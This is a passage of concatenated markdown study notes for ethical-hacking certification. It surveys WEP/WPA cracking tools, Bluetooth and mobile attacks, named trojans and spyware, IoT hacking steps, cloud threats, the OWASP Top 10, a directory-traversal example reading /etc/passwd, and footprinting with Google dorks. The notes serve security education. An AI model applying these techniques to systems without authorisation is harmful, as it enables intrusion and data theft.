IVs (Initialization Vector) for the intent of using them with aircrack-ng. 221 | - **`airmon-ng`** - Used to enable monitor mode on wireless interfaces. 222 | - **`aireplay-ng`** - Is used to inject frames (arp replay, deauthentication attack, etc). 223 | - **`aircrack-ng`** - Is an 802.11 WEP and WPA/WPA2-PSK key cracking program. 224 | 225 | - **Cain and Abel** - Sniffs packets and cracks passwords (may take longer) 226 | - Relies on statistical measures and the PTW technique to break WEP 227 | - **Wifite** - Is an automated wireless attack tool. 228 | - **KisMAC** - MacOS tool to brute force WEP or WPA 229 | passwords 230 | - **Fern WiFi Cracker** 231 | - **WEPAttack** 232 | - **WEPCrack** 233 | - **Portable Penetrator** 234 | - **Elcomsoft's Wireless Security Auditor** 235 | - Methods to crack include **PTW**, **FMS**, and **Korek** technique 236 | 237 | 238 | ## Bluetooth Attacks 239 | - **Bluesmacking** - Denial of service against device 240 | - **Bluejacking** - Sending unsolicited messages 241 | - **Bluebugging** - Remotely using a device's features 242 | - **Bluesnarfing** - Theft of data from a device 243 | 244 | ## Wireless Sniffing 245 | 246 | - Very similar to sniffing a wired network 247 | - **Tools** 248 | - **NetStumbler** 249 | - **Kismet** - is a network detector, packet sniffer, and IDS for 802.11 wireless LANs. 250 | - **OmniPeek** - provides data like Wireshark in addition to network activity and monitoring 251 | - **AirMagnet WiFi Analyzer Pro** - sniffer, traffic analyzer and network-auditing suite 252 | - **WiFi Pilot** 253 | 254 | ## Protecting Wireless Networks - Best practices 255 | 256 | - Use 802.11i 257 | - WPA2 258 | - AES encryption 259 | - MAC Filtering with ACL *(It's not a final solution, hackers can circumvent)* 260 | - Disable SSID broadcast *(It's not a final solution, hackers can circumvent)* 261 | - Use VPN in case of home office (connecting externally) 262 | 263 | ⚠️ Warnings of Public / Free Wi-Fi 264 | - Session hijacking 265 | - Rogue APs 266 | - Evil Twins 267 | -------------------------------------------------------------------------------- /17-Hacking-Mobile-Platforms-and-IoT.md: -------------------------------------------------------------------------------- 1 | # Hacking Mobile Platforms and IoT 2 | 3 | # A) Mobile Platform Hacking 4 | 5 | - **Three Main Avenues of Attack** 6 | - **Device Attacks** - browser based, SMS, application attacks, rooted/jailbroken devices 7 | - **Network Attacks** - DNS cache poisoning, rogue APs, packet sniffing 8 | - **Data Center (Cloud) Attacks** - databases, photos, etc. 9 | 10 |
11 | 12 | - **OWASP Top 10 Mobile Risks:** 13 | - ![owasp-mobile](https://www.nowsecure.com/wp-content/uploads/2016/10/OWASP-Mobile-Top-10.png) 14 | 15 |
16 | 17 | - **M1 - Improper Platform Usage** - Misuse of features or security controls (Android intents, TouchID, Keychain) 18 | 19 | - **M2 - Insecure Data Storage** - Improperly stored data and data leakage 20 | 21 | - **M3 - Insecure Communication** - Poor handshaking, incorrect SSL, clear-text communication 22 | 23 | - **M4 - Insecure Authentication** - Authenticating end user or bad session management 24 | 25 | - **M5 - Insufficient Cryptography** - Code that applies cryptography to an asset, but is insufficient (does NOT include SSL/TLS) 26 | 27 | - **M6 - Insecure Authorization** - Failures in authorization (access rights) 28 | 29 | - **M7 - Client Code Quality** - Catchall for code-level implementation problems 30 | 31 | - **M8 - Code Tampering** - Binary patching, resource modification, dynamic memory modification 32 | 33 | - **M9 - Reverse Engineering** - Reversing core binaries to find problems and exploits 34 | 35 | - **M10 - Extraneous Functionality** - Catchall for backdoors that were inadvertently placed by coders 36 | 37 | ## Mobile Platforms 38 | 39 | - **Android** - platform built by Google 40 | - **Rooting** - name given to the ability to have root access on an Android device 41 | - **Tools** 42 | - KingoRoot 43 | - TunesGo 44 | - OneClickRoot 45 | - MTK Droid 46 | - **iOS** - platform by Apple 47 | - **Jailbreaking** - different levels of rooting an iOS device 48 | - **Tools** 49 | - evasi0n7 50 | - GeekSn0w 51 | - Pangu 52 | - Redsn0w 53 | - Absinthe 54 | - Cydia 55 | - **Techniques** 56 | - **Untethered** - kernel remains patched after reboot, with or without a system connection 57 | - **Semi-Tethered** - reboot no longer retains patch; must use installed jailbreak software to re-jailbreak 58 | - **Tethered** - reboot removes all jailbreaking patches; phone may get in boot loop requiring USB to repair 59 | - **Types** 60 | - **Userland exploit** - found in the system itself; gains root access; does not provide admin; can be patched by Apple 61 | - **iBoot exploit** - found in bootloader called iBoot; uses vulnerability to turn codesign off; semi-tethered; can be patched 62 | - **BootROM exploit** - allows access to file system, iBoot and custom boot logos; found in device's first bootloader; cannot be patched 63 | - **App Store attacks** - since some App stores are not vetted, malicious apps can be placed there 64 | - **Phishing attacks** - mobile phones have more data to be stolen and are just as vulnerable as desktops 65 | - **Android Device Administration API** - allows for security-aware apps that may help 66 | - **Bring Your Own Device** (BYOD) - dangerous for organizations because not all phones can be locked down by default 67 | - **Mobile Device Management** - like group policy on Windows; helps enforce security and deploy apps from enterprise 68 | - MDM solutions include XenMobile, IBM, MaaS360, AirWatch and MobiControl 69 | - **Bluetooth attacks** - if a mobile device can be connected to easily, it can fall prey to Bluetooth attacks 70 | - **Discovery mode** - how the device reacts to inquiries from other devices 71 | - **Discoverable** - answers all inquiries 72 | - **Limited Discoverable** - restricts the action 73 | - **Nondiscoverable** - ignores all inquiries 74 | - **Pairing mode** - how the device deals with pairing requests 75 | - **Pairable** - accepts all requests 76 | - **Nonpairable** - rejects all connection requests 77 | 78 | ## Mobile Attacks 79 | All other attacks presented on previous chapter are suceptible to mobile devices too attacks like session hijacking, browser vulnerabilities, XSS, email, SMS, phone, OS/Apps bugs, excessive permissions and so on. Vulnerabilities on connection (Bluetooth, WiFi, NFC), encryption. 80 | 81 | 82 | - **SMS Phishing (Smishing)** - sending texts with malicious links 83 | - People tend to trust these more because they happen less 84 | - **Trojans Available to Send** 85 | - Obad 86 | - Fakedefender 87 | - TRAMPS 88 | - ZitMo 89 | - **Spyware** 90 | - Mobile Spy 91 | - Spyera 92 | - Mobile platform features such as Find my iPhone, Android device tracking and the like can be hacked to find devices, etc. 93 | - **Mobile Attack Platforms** - tools that allow you to attack from your phone 94 | - Network Spoofer 95 | - DroidSheep 96 | - Nmap 97 | 98 | ### Bluetooth: 99 | - **Bluetooth Attacks** 100 | - **Bluesmacking** - Denial of service against device 101 | - **Bluejacking** - Sending unsolicited messages 102 | - **Bluesniffing** - Attempt to discover Bluetooth devices 103 | - **Bluebugging** - Remotely using a device's features 104 | - **Bluesnarfing** - Theft of data from a device 105 | - **Blueprinting** - Collecting device information over Bluetooth 106 | 107 | - **Bluetooth Attack Tools** 108 | - **BlueScanner** - finds devices around you 109 | - **BT Browser** - another tool for finding and enumerating devices 110 | - **Bluesniff** and **btCrawler** - sniffing programs with GUI 111 | - **Bloover** - can perform Bluebugging 112 | - **PhoneSnoop** - good spyware option for Blackberry 113 | - **Super Bluetooth Hack** - all-in-one package that allows you to do almost anything 114 | 115 | ## Improving Mobile Security 116 | - Always check OS and Apps are up to date 117 | - Screen Locks + Passwords 118 | - Secure Wireless comunication 119 | - No Jailbreaking or Rooting 120 | - Don't store sensitive information on mobile (like confidential information from company) 121 | - Remote desktop (e.g. Citrix) 122 | - Use Official app stores 123 | - Anti-virus 124 | - Remote wipe option 125 | - Remote management 126 | - Remote tracking 127 | 128 | ⚠️ Companies should use **MDM policies** to accomplish mobile security. 129 | 130 | 131 | # B) IoT Architecture 132 | 133 | ### **- What is IoT?** 134 | ***The Internet of Things (IoT)** describes the network of physical objects—“things”—that are embedded with sensors, software, and other technologies for the purpose of connecting and exchanging data with other devices and systems over the internet.* 135 | 136 | - Traditional fields of embedded systems, wireless sensor networks, control systems, automation (including home and building automation), and others all contribute to enabling the Internet of things. 137 | 138 | - ![iot](https://www.researchgate.net/profile/Akram_Hakiri/publication/281896657/figure/fig1/AS:391492888743939@1470350586428/High-level-IoT-architecture.png) 139 | 140 | - **Three Basic Components** 141 | - Sensing Technology 142 | - IoT gateways 143 | - The cloud 144 | 145 | ### **Methods of Communicating** 146 | *IoT connectivity boils down to how things connect to each other. Can be wired, wireless, 4G LTE, Bluetooth, GPS, LoRa, mesh networking, RFID, WiFi, Zigbee and Z-wave.* 147 | 148 | - **Device to Device** - Direct communication between two devices. 149 | - **Device to Cloud** - Communicates directly to a cloud service. 150 | - **Device to Gateway** - Communicate to a centralized gateway that gathers data and then sends it to an application server based in the cloud. 151 | - **Back-End Data Sharing** - Used to scale the device to cloud model to allow for multiple devices to interact withone or more application servers. 152 | 153 | > ⚠️ **Zigbee** and **Z-Wave** is a wireless mesh networking protocol popular in home automation. 154 | 155 | ### **Edge Computing** 156 | *Edge Computing is a distributed computing paradigm in which processing and computation are performed mainly on classified device nodes known as smart devices or edge devices as opposed to processed in a centralized cloud environment or data centers.* 157 | 158 |

159 | 160 |

161 | 162 | - It helps to provide server resources, data analysis, and artificial intelligence to data collection sources and cyber-physical sources like smart sensors and actuators. 163 | 164 | > ⚠️ **Edge computing** handling data by pushing into the cloud. **Fog Computing** is more like keep things locally. 165 | 166 | ### **Multi-Layer Architecture of IoT** 167 | - **Edge Technology Layer** - consists of sensors, RFID tags, readers and the devices 168 | - **Access Gateway Layer** - first data handling, message identification and routing 169 | - **Internet Layer** - crucial layer which serves as main component to allow communication 170 | - **Middleware Layer** - sits between application and hardware; handles data and device management, data analysis and aggregation 171 | - **Application Layer** - responsible for delivery of services and data to the user 172 | 173 | ### **IoT Technology Protocols** 174 | - **Short-Range Wireless:** 175 | - Bluetooth Low-energy (BLE) 176 | - Light-Fidelity (Li-Fi) 177 | - Near Field Communication (NFC) 178 | - QR Codes & Barcodes 179 | - Radio-frequency Identification (RFID) 180 | - Wi-fi / Direct 181 | - Z-wave 182 | - Zigbee 183 | - **Medium-Range Wireless:** 184 | - Ha-Low 185 | - LTE-Advanced 186 | - **Long-Range Wireless:** 187 | - Low-power Wide-area Networking (LPWAN) 188 | - LoRaWAN 189 | - Sigfox 190 | - Very Smart Aperture Terminal (VSAT) 191 | - Cellular 192 | - **Wired Communications:** 193 | - Ethernet 194 | - Power-Line Communication (PLC) 195 | - Multimedia over Coax Alliance (MoCA) 196 | 197 | ### **IoT Operating Systems** 198 | - **RIOT OS** - Embedded systems, actuator boards, sensors; is energy efficient 199 | - **ARM Mbed OS** - Mostly used on wearables and other low-powered devices 200 | - **RealSense OS X** - Intel's depth sensing version; mostly found in cameras and other sensors 201 | - **Nucleus RTOS** - Used in aerospace, medical and industrial applications 202 | - **Brillo** - Android-based OS; generally found in thermostats 203 | - **Contiki** - OS made for low-power devices; found mostly in street lighting and sound monitoring 204 | - **Zephyr** - Option for low-power devices and devices without many resources 205 | - **Ubuntu Core** - Used in robots and drones; known as "snappy" 206 | - **Integrity RTOS** - Found in aerospace, medical, defense, industrial and automotive sensors 207 | - **Apache Mynewt** - Used in devices using Bluetooth Low Energy Protocol 208 | 209 | ### **Geofencing** 210 | *Uses GPS and RFID technologies to create a virtual geographic boundary, like around your home property. A response is then triggered any time a mobile device enters or leaves the area.* 211 | 212 | ### **Grid Computing** 213 | Reduces costs by maximizing existing resources. This is accomplished with **multiple machines together to solve a specific problem.** 214 | 215 | ### **Analytics of Things (AoT)** 216 | - The analysis of IoT data, which is the data being generated by IoT sensors and devices. 217 | 218 | ### **Industrial IoT (IIoT)** 219 | ![iiot](https://i1.wp.com/intellinium.io/wp-content/uploads/2016/12/iot_edited.png?w=800&ssl=1) 220 | 221 | *The industrial internet of things (IIoT) refers to the extension and use of the internet of things (IoT) in industrial sectors and applications. With a strong focus on machine-to-machine (M2M) communication, big data, and machine learning, the IIoT enables industries and enterprises to have better efficiency and reliability in their operations.* 222 | 223 | - **The IIoT encompasses industrial applications, including robotics, medical devices, and software-defined production processes.** 224 | 225 | ## IoT Vulnerabilities and Attacks: 226 | 227 | ### **OWASP Top 10 IoT Vulnerabilities (2014)** 228 | - **I1 - Insecure Web Interface** 229 | - Problems such as account enumeration, weak credentials, and no account lockout 230 | - **I2 - Insufficient Authentication/Authorization** 231 | - Assumes interfaces will only be exposed on internal networks and thus is a flaw 232 | - **I3 - Insecure Network Services** 233 | - May be susceptible to buffer overflow or DoS attacks 234 | - **I4 - Lack of Transport Encryption/Integrity Verification** 235 | - Data transported without encryption 236 | - **I5 - Privacy Concerns** 237 | - Due to collection of personal data 238 | - **I6 - Insecure Cloud Interface** 239 | - Easy-to-guess credentials make enumeration easy 240 | - **I7 - Insecure Mobile Interface** 241 | - Easy-to-guess credentials on mobile interface 242 | - **I8 - Insufficient Security Configurability** 243 | - Cannot change security which causes default passwords and configuration 244 | - **I9 - Insecure Software/Firmware** 245 | - Lack of a device to be updated or devices that do not check for updates 246 | - **I10 - Poor Physical Security** 247 | - Because of the nature of devices, these can easily be stolen 248 | 249 | --- 250 | 251 | ### **OWASP Top 10 IoT Vulnerabilities (2018)** 252 | 253 | - **1. Weak, guessable, or hardcoded passwords** 254 | - Use of easily bruteforced, publicly available, or unchangeable credentials, including backdoors in firmware or client software that grants unauthorized access to deployed systems. 255 | 256 | - **2. Insecure network services** 257 | - Unneeded or insecure network services running on the device itself, especially those exposed to the internet, that compromise the confidentiality, integrity/authenticity, or availability of information or allow unauthorized remote control… 258 | 259 | - **3. Insecure ecosystem interfaces** 260 | - Insecure web, backend API, cloud, or mobile interfaces in the ecosystem outside of the device that allows compromise of the device or its related components. Common issues include a lack of authentication/authorization, lacking or weak encryption, and a lack of input and output filtering. 261 | 262 | - **4. Lack of secure update mechanism** 263 | - Lack of ability to securely update the device. This includes lack of firmware validation on device, lack of secure delivery (un-encrypted in transit), lack of anti-rollback mechanisms, 264 | and lack of notifications of security changes due to updates. 265 | - **5. Use of insecure or outdated components** 266 | - Use of deprecated or insecure software components/libraries that could allow the device to be compromised. This includes insecure customization of operating system platforms, and the use of third-party software or hardware components from a compromised supply chain. 267 | - **6. Insufficient privacy protection** 268 | - User’s personal information stored on the device or in the ecosystem that is used insecurely, improperly, or without permission. 269 | - **7. Insecure data transfer and storage** 270 | - Lack of encryption or access control of sensitive data anywhere within the ecosystem, including at rest, in transit, or during processing. 271 | - **8. Lack of device management** 272 | - Lack of security support on devices deployed in production, including asset management, update management, secure decommissioning, systems monitoring, and response capabilities. 273 | - **9. Insecure default settings** 274 | - Devices or systems shipped with insecure default settings or lack the ability to make the system more secure by restricting operators from modifying configurations. 275 | - **10. Lack of physical hardening** 276 | - Lack of physical hardening measures, allowing potential attackers to gain sensitive information that can help in a future remote attack or take local control of the device. 277 | --- 278 | 279 | 280 | 281 | ## Common IoT Attack Areas 282 | 1. Device memory containing credentials 283 | 2. Device / Ecosystem Access Control 284 | 3. Device Physical Interfaces / Fimrware extraction 285 | 4. Device web interface 286 | 5. Device Firmware 287 | 6. Device network services 288 | 7. Devices administrative interface(s) 289 | 8. Unencrypted Local data storage 290 | 9. Cloud interface(s) 291 | 10. Device update mechanism(s) 292 | 11. Insecure API's (vendor & thir-party) 293 | 12. Mobile application 294 | 13. Confidentiality and Integrity issues across the ecosystem 295 | 14. Network traffic 296 | 297 | ## IoT Threats 298 | 1. **DDoS Attack** 299 | 2. **HVAC System attacks** - Attacks on HVAC systems 300 | 3. **Rolling code attack** - Used to steal cars; The ability to jam a key fob's communications, steal the code and then create a subsequent code 301 | 4. **BlueBorne attack** - Attacks against Bluetooth devices 302 | 5. **Jamming attack** 303 | 6. **Remote access via backdoors** 304 | 7. **Remote access via unsecured protocols** such as TELNET 305 | 8. **Sybil attack** - Uses multiple forged identities to create the illusion of traffic; happens when a insecure computer is hijacked to claim multiple identities. 306 | 9. **Rootkits / Exploit kits** 307 | 10. **Ransomware** 308 | 309 | 310 | > ⚠️ **Other attacks already enumerated in other sections still apply such as MITM, ransomware, side channel, replay attack etc.** 311 | 312 | ## IoT Hacking Methodology 313 | 314 | ### **Steps**: 315 | 1. **Information Gathering** - gathering information about the devices; 316 | - **Tools**: 317 | - Shodan 318 | - Censys 319 | - Thingful 320 | - Google 321 | 322 | 2. **Vulnerability Scanning** - same as normal methodology - looks for vulnerabilities 323 | - **Tools:** 324 | - Nmap 325 | - Multi-ping 326 | - RIoT Vulnerability Scanner 327 | - Foren6 (traffic sniffer) 328 | - beSTORM 329 | 330 | 3. **Launching Attacks** 331 | - **Tools:** 332 | - RFCrack 333 | - Attify Zigbee Framework 334 | - HackRF 335 | - Firmalyzer 336 | 337 | 4. **Gaining Access** - same objectives as normal methodology 338 | 339 | 5. **Maintaining Access** - same objectives as normal methodology 340 | --- 341 | ## Countermeasures to help secure IoT devices: 342 | 343 | 1. Firmware updates 344 | 2. Block ALL unecessary ports 345 | 3. Disable insecure access protocols such as TELNET 346 | 4. Only use encrypted communication protocols 347 | 5. Use strong passwords 348 | 6. Encrypt ALL data and communications coming into, being stored in and leaving the device 349 | 7. Use account lockout 350 | 8. Configuration management and baselining of devices along with compliance monitoring 351 | 9. Use multi-factor authentication 352 | 10. Disable UPnP 353 | -------------------------------------------------------------------------------- /19-Cloud Computing.md: -------------------------------------------------------------------------------- 1 | # Cloud Computing 2 | 3 | ## Cloud Computing Basics 4 | 5 | - **Three Types of Service Models**: 6 | - **Infrastructure as a Service (IaaS)** 7 | - Provides virtualized computing resources 8 | - Third party hosts the servers with hypervisor running the VMs as guests 9 | - Subscribers usually pay on a per-use basis 10 | - e.g: AWS, Microsoft Azure, Digital Ocean, Google Cloud 11 | - **Platform as a Service (Paas)** 12 | - Geared towards software development 13 | - Hardware and software hosted by provider 14 | - Provides ability to develop without having to worry about hardware or software 15 | - e.g: Heroku, SalesForce 16 | - **Software as a Service (SaaS)** 17 | - Provider supplies on-demand applications to subscribers 18 | - Offloads the need for patch management, compatibility and version control 19 | - e.g: Microsoft Office 365, Dropbox storage, Google Docs. 20 | 21 | 22 | Tech stack | Type 23 | --|-- 24 | Software | SaaS 25 | Apps | PaaS 26 | OS | IaaS 27 | Virtualization | managed by provider 28 | Storage/Networking | managed by provider 29 | 30 | --- 31 | 32 |

33 | 34 |

35 | 36 | ## Cloud Deployment Models 37 | 38 | - **Private Cloud** - Cloud solely for use by one tenant; usually done in larger organizations. 39 | - **Community Cloud** - Is make up of infrastructure from several different entitites wich may be cloud providers, business partners, and so on. (members only type of thing) 40 | - **Public Cloud** - Services provided over a network that is open for public to use; Amazon S3, Microsoft Azure - Open for business. 41 | - **Hybrid Cloud** - A composition of two or more cloud deployment models. 42 | 43 | ## **NIST Cloud Architecture** 44 | *The NIST cloud computing reference architecture (NIST SP 500-292) define five major actors; Each actor is an entity (a person or an organization) that participates in a transaction or process and/or perform tasks in cloud computing.* 45 | 46 | - **Cloud Consumer** - A person or org. that maintains a business relationship with, and use servies from Cloud Providers; aquires and uses cloud products and services. 47 | - **Cloud Provider** - A person, org. or entity responsible for making a service available; Purveyor of products and services. 48 | - **Cloud Auditor** - Independent assor of cloud service an security controls. 49 | - **Cloud Broker** - Manages use, performance and delivery of services as well as relationships between Cloud Providers to Cloud consumers. 50 | - **Cloud Carrier** - Organization with responsibility of transferring data; Intermediary that provides connectivity and transport of Cloud services from Cloud providers to Cloud consumers. (e.g: Telecom's) 51 | 52 | > ⚠️ - **FedRAMP** - regulatory effort regarding cloud computing 53 | 54 | > ⚠️ - **PCI DSS** - deals with debit and credit cards, but also has a cloud SIG 55 | 56 | 57 | ## Five characteristics of cloud computing 58 | 59 | ***The National Institute of Standards and Technology (NIST)** defines cloud computing as it is known today through five particular characteristics.* 60 | 61 | 1. **On-demand self-service** 62 | 63 | 2. **Broad network access** 64 | 65 | 3. **Multi-tenancy and resource pooling** 66 | 67 | 4. **Rapid elasticity and scalability** 68 | 69 | 5. **Measured service** 70 | 71 | 72 | ## Threats: 73 | 74 | - **Data Breach or Loss** - Biggest threat; includes malicious theft, erasure or modification 75 | 76 | - **Shadow IT** - IT systems or solutions that are developed to handle an issue but aren't taken through proper approval chain 77 | 78 | - **Abuse of Cloud Resources** - Another high threat (usually applies to Iaas and PaaS) 79 | 80 | - **Insecure Interfaces and APIs** - Cloud services can't function without them, but need to make sure they are secure 81 | 82 | - **Service Oriented Architecture** - API that makes it easier for application components to cooperate and exchange information 83 | 84 | - **Insufficient due diligence** - Moving an application without knowing the security differences 85 | 86 | - **Shared technology issues** - Multitenant environments that don't provide proper isolation 87 | 88 | - **Unknown risk profiles** - Subscribers simply don't know what security provisions are made int he background 89 | 90 | - **Wrapping Attack** - SOAP message intercepted and data in envelope is changed and sent/replayed 91 | 92 | - **Session riding** - CSRF under a different name; deals with cloud services instead of traditional data centers 93 | 94 | - **Others include malicious insiders, inadequate design and DDoS** 95 | - Other threats: 96 | - Loss/compromise of encryption keys 97 | - Isolation failure 98 | - Compliance risk 99 | - VM vulnerabilities 100 | - Vendor lock-on 101 | - Jurisdictional issues based on chaning geographic boundaries 102 | - E-discovery/subpoena 103 | - Cloud service termination/failure 104 | - Improper/incomplete data handling & disposal 105 | - Management network failure/interface compromise 106 | 107 | ## Attacks: 108 | 1. Service hijacking via Social engineering & network sniffing 109 | 2. Session hijacking using XSS 110 | 3. DNS attacks 111 | 4. Side channel attacks - (e.g.: Using an existing VM on the same physical host to attack another) 112 | 5. Cross VM attacks 113 | 6. SQL injection 114 | 7. Cryptanalysis attacks 115 | 8. Wrapping attacks - performed during the translation of SOAP messages in the TLS layer; attackers duplicate the body of the message and send it to the targeted server impersonating the legitimate user. 116 | 9. DoS/DDoS attack 117 | 10. Main-in-the-Cloud attacks - abuse of cloud file synchronization services br tracking the user into installing malicious software that places the attacker's synchronization token for the service ton their machine, allowing the attacker to steal the user's token and gain access to their files. 118 | 119 | ## OWASP Top 10 Application Security Risks 120 | 121 | 1. **Injection** - Injection flaws, such as SQL, NoSQL, OS, and LDAP injection, occur when untrusted data is sent to an interpreter as part of a command or query. The attacker’s hostile data can trick the interpreter into executing unintended commands or accessing data without proper authorization. 122 | - Input validation 123 | - Limit account privileges 124 | 125 | 2. **Broken Authentication** - Application functions related to authentication and session management are often implemented incorrectly, allowing attackers to compromise passwords, keys, or session tokens, or to exploit other implementation flaws to assume other users’ identities temporarily or permanently. 126 | 127 | 3. **Sensitive Data Exposure** - Many web applications and APIs do not properly protect sensitive data, such as financial, healthcare, and PII. Attackers may steal or modify such weakly protected data to conduct credit card fraud, identity theft, or other crimes. Sensitive data may be compromised without extra protection, such as encryption at rest or in transit, and requires special precautions when exchanged with the browser. 128 | 129 | 4. **XML External Entities (XXE)** - Many older or poorly configured XML processors evaluate external entity references within XML documents. External entities can be used to disclose internal files using the file URI handler, internal file shares, internal port scanning, remote code execution, and denial of service attacks. 130 | - If your application uses SAML for identify processing with federated security or Single Sing on (SSO). SAML uses XML. 131 | - If applications accepts XML directly or XML uploads from unstrusted sources, or inserts untrusted data into XML documents. 132 | - Any of XML processors in the application or SOAP based web services that have (DTDs) enabled. 133 | 134 | 5. **Broken Access Control** - Restrictions on what authenticated users are allowed to do are often not properly enforced. Attackers can exploit these flaws to access unauthorized functionality and/or data, such as access other users’ accounts, view sensitive files, modify other users’ data, change access rights, etc. 135 | 136 | 6. **Security Misconfiguration** - is the most commonly seen issue. This is commonly a result of insecure default configurations, incomplete or ad hoc configurations, open cloud storage, misconfigured HTTP headers, and verbose error messages containing sensitive information. Not only must all operating systems, frameworks, libraries, and applications be securely configured, but they must be patched/upgraded in a timely fashion. 137 | 138 | 7. **Cross-Site Scripting XSS** - occur whenever an application includes untrusted data in a new web page without proper validation or escaping, or updates an existing web page with user-supplied data using a browser API that can create HTML or JavaScript. XSS allows attackers to execute scripts in the victim’s browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites. 139 | - Reflected XSS 140 | - Stored XSS 141 | - DOM XSS 142 | 143 | 8. **Insecure Deserialization** - often leads to remote code execution. Even if deserialization flaws do not result in remote code execution, they can be used to perform attacks, including replay attacks, injection attacks, and privilege escalation attacks. 144 | 145 | 9. **Using Components with Known Vulnerabilities** - Components, such as libraries, frameworks, and other software modules, run with the same privileges as the application. If a vulnerable component is exploited, such an attack can facilitate serious data loss or server takeover. Applications and APIs using components with known vulnerabilities may undermine application defenses and enable various attacks and impacts. 146 | 147 | 10. **Insufficient Logging & Monitoring** - Insufficient logging and monitoring, coupled with missing or ineffective integration with incident response, allows attackers to further attack systems, maintain persistence, pivot to more systems, and tamper, extract, or destroy data. Most breach studies show time to detect a breach is over 200 days, typically detected by external parties rather than internal processes or monitoring. 148 | 149 | ## Additional Attacks 150 | 1. **Directory Traversal** (../) - An attacker can get sensitive information like the contents of the /etc/passwd file that contains a list of users on the server; Log files, source code, access.log and so on 151 | 2. **Cross-site Request Forgery (CSRF)** - Forces an end user to execute unwanted actions on an app they're already authenticated on 152 | - Inherits identity and privileges of victim to perform an undesired function on victim's behalf 153 | - Captures the session and sends a request based off the logged in user's credentials 154 | - Can be mitigated by sending **random challenge tokens** 155 | 156 | ## Cloud Security Control Layers 157 | 158 | *Problem with cloud security is what you are allowed to test and what should you test; Another concern is with a hypervisor, if the hypervisor is compromised, all hosts on that hypervisor are as well.* 159 | 160 | 1. **Applications** - SDCL (Software development cycle), WAF (web application firewall) 161 | 162 | 2. **Information** - DLP, encryption 163 | 164 | 3. **Management** - GRC, IAM , Patch & Configuration 165 | 166 | 4. **Network** - NIDS/NIPS, DNSSEC, QoS 167 | 168 | 5. **Trusted Computing Model** - attempts to resolve computer security problems through hardware enhancements 169 | - **Roots of Trust (RoT)** - set of functions within TCM that are always trusted by the OS 170 | 171 | 6. **Computer & Network Storage** - Encryption, Host-based firewall, HIDS/HIPS 172 | 173 | 7. **Physical** - Guards, Gates, Fences etc. 174 | 175 | **Tools** 176 | - **CloudInspect** - pen-testing application for AWS EC2 users 177 | - **CloudPassage Halo** - instant visibility and continuous protection for servers in any cloud 178 | - **Dell Cloud Manager** 179 | - **Qualys Cloud Suite** 180 | - **Trend Micro's Instant-On Cloud Security** 181 | - **Panda Cloud Office Protection** 182 | -------------------------------------------------------------------------------- /2-Footprinting-and-Reconnaissance.md: -------------------------------------------------------------------------------- 1 | # Reconnaissance and Footprinting 2 | 3 | > ⚡︎ **This chapter have [practical labs](https://github.com/Samsar4/Ethical-Hacking-Labs/tree/master/1-Footprinting-and-Reconnaissance)** 4 | 5 | ## Footprinting 6 | Footprinting is a part of reconnaissance process which is used for gathering possible information about a target computer system or network. 7 | 8 | When used in the computer security lexicon, "Footprinting" generally refers to one of the pre-attack phases; tasks performed before doing the actual attack. **Some of the tools used for Footprinting are Sam Spade, nslookup, traceroute, Nmap and neotrace.** 9 | 10 | ## Footprinting Types: Active and Passive 11 | 12 | - **Active** - requires attacker to touch the device or network 13 | - Social engineering and other communication that requires interaction with target 14 | - **Passive** - measures to collect information from publicly available sources 15 | - Websites, DNS records, business information databases 16 | 17 | ### Footprinting helps to: 18 | 19 | - **Know Security Posture** – The data gathered will help us to get an overview of the security posture of the company such as details about the presence of a firewall, security configurations of applications etc. 20 | 21 | - **Reduce Attack Area** – Can identify a specific range of systems and concentrate on particular targets only. This will greatly reduce the number of systems we are focussing on. 22 | 23 | - **Identify vulnerabilities** – we can build an information database containing the vulnerabilities, threats, loopholes available in the system of the target organization. 24 | 25 | - **Draw Network map** – helps to draw a network map of the networks in the target organization covering topology, trusted routers, presence of server and other information. 26 | 27 | Footprinting could be both **passive** and **active**. Reviewing a company’s website is an example of passive footprinting, whereas attempting to gain access to sensitive information through social engineering is an example of active information gathering. 28 | 29 | During this phase, a hacker can collect the following information (only high-level information): 30 | 31 | - **Domain name** 32 | - **IP Addresses** 33 | - **Namespaces** 34 | - **Employee information** 35 | - **Phone numbers** 36 | - **E-mails** 37 | - **Job Information** 38 | 39 | Can be: 40 | - **Anonymous** - information gathering without revealing anything about yourself 41 | - **Pseudonymous** - making someone else take the blame for your actions 42 | 43 | **Competitive Intelligence** - information gathered by businesses about competitors 44 | 45 | **Alexa.com** - resource for statistics about websites 46 | 47 | ## Footprinting Objectives 48 | 49 | - **Network** 50 | - DNS 51 | - IP networks 52 | - Acessible Systems 53 | - Websites 54 | - Access Control 55 | - VPN Endpoints 56 | - Firewall vendors 57 | - IDS Systems 58 | - Routing/Routed Protocols 59 | - Phone System (Analog/VoIP) 60 | 61 | - **Organization** 62 | - Org Structure 63 | - Websites 64 | - Phone Numbers 65 | - Directory Information 66 | - Office Locations 67 | - Company History 68 | - Business Associations 69 | 70 | - **Hosts** 71 | - Listening Services 72 | - Operating System Versions 73 | - Internet Reachability 74 | - Enumerated Information 75 | - SNMP Info 76 | - Users/Groups 77 | - Mobile Devices 78 | 79 | ## Methods and Tools 80 | 81 | ### Search Engines 82 | 83 | - **[NetCraft](https://www.netcraft.com/)** - Blueprint a comprehensive list of information about the technologies and information about target website. 84 | - ![netcraft](https://i0.wp.com/hackingblogs.com/wp-content/uploads/2018/01/Capture-min-2.png) 85 | - **Job Search Sites** - Information about technologies can be gleaned from job postings. 86 | - **Google search | Google dorks:** 87 | - `filetype:` - looks for file types 88 | - `index of` - directory listings 89 | - `info:` - contains Google's information about the page 90 | - `intitle:` - string in title 91 | - `inurl:` - string in url 92 | - `link:` - finds linked pages 93 | - `related:` - finds similar pages 94 | - `site:` - finds pages specific to that site 95 | - **Example**: 96 | - ![google-dorks](https://miro.medium.com/max/659/0*GGRvHnh59qi5lVB9.png) 97 | - [GHDB](https://www.exploit-db.com/google-hacking-database) is very good for learn Google Dorks and how it's done in real world scenario 98 | - **Metagoofil** - Command line interface that uses **Google hacks** to find information in meta tags (domain, filetype, etc; Is a google dorks for terminal). 99 | 100 | ### Website Footprinting 101 | 102 | - **Web mirroring | Website Cloning** - allows for discrete testing offline 103 | - **HTTrack** - *you can use the CLI version or Web Interface version* 104 | - **Wget** - Linux command 105 | - `wget -mk -w 10 http://hackthissite.org/` 106 | - **Black Widow** 107 | - **WebRipper** 108 | - **Teleport Pro** 109 | - **Backstreet Browser** 110 | - **Archive.org / [Wayback machine](https://archive.org/web/)** 111 | - Provides cached websites from various dates which possibly have sensitive information that has been now removed. 